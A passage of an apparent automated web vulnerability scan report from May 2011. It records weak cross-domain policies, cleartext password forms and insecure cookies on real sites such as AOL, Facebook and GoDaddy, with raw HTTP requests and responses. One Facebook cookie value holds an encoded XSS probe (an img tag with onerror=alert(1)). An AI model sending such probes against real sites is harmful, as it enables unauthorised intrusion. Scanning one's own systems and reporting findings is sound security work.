Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

3.23. http://www.popeater.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.24. http://www.realtytrac.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realtytrac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.realtytrac.com" />
   <allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

3.25. http://www.tuaw.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.26. http://www.truveo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>


4. Silverlight cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.facebook.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.2. http://www.facebook.com/r.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

6. SSL cookie without secure flag set
There are 17 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

6.2. https://www.godaddy.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.3. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.4. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.5. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.6. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

6.7. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.8. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
